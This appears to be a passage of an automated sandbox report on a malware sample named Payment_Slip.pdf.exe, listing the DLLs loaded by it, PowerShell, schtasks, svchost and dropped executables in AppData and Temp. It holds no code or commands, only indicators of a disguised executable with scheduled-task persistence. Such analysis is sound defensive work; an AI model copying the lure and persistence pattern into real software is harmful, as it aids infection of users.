Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: fastprox.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: ncobjapi.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: mpclient.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wmitomi.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: mi.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: miutils.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: miutils.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Section loaded: dwrite.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Section loaded: riched20.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Section loaded: usp10.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Section loaded: msls31.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Section loaded: iconcodecservice.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: qmgr.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: bitsperf.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: powrprof.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: firewallapi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: esent.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: umpdc.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: fwbase.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: flightsettings.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: netprofm.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: npmproxy.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: bitsigd.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: upnp.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: ssdpapi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: appxdeploymentclient.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: wsmauto.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: miutils.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: wsmsvc.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: dsrole.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: pcwum.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: mi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: wkscli.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: msv1_0.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: ntlmshared.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: cryptdll.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: webio.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: rmclient.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: usermgrcli.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: execmodelclient.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: twinapi.appcore.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: execmodelproxy.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: resourcepolicyclient.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: vssapi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: vsstrace.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: samcli.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: samlib.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: es.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: bitsproxy.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\host.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\host.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\host.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\host.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\host.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\host.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\host.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\host.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\host.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\host.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\host.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\host.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\host.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\host.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\host.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Roaming\host.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\host.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\host.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\host.exe Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Roaming\host.exe Section loaded: rasman.dll
Source: C:\Users\user\AppData\Roaming\host.exe Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Roaming\host.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\host.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Roaming\host.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Roaming\host.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\host.exe Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Roaming\host.exe Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Roaming\host.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Roaming\host.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Roaming\host.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Roaming\host.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Roaming\host.exe Section loaded: secur32.dll
Source: C:\Users\user\AppData\Roaming\host.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Roaming\host.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Roaming\host.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Roaming\host.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Roaming\host.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Roaming\host.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\host.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\host.exe Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Roaming\host.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\Roaming\host.exe Section loaded: vaultcli.dll
Source: C:\Users\user\AppData\Roaming\host.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Roaming\host.exe Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Section loaded: sxs.dll
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Section loaded: vaultcli.dll
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Section loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Section loaded: windowscodecs.dll
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section loaded: version.dll
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section loaded: wininet.dll
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section loaded: sspicli.dll
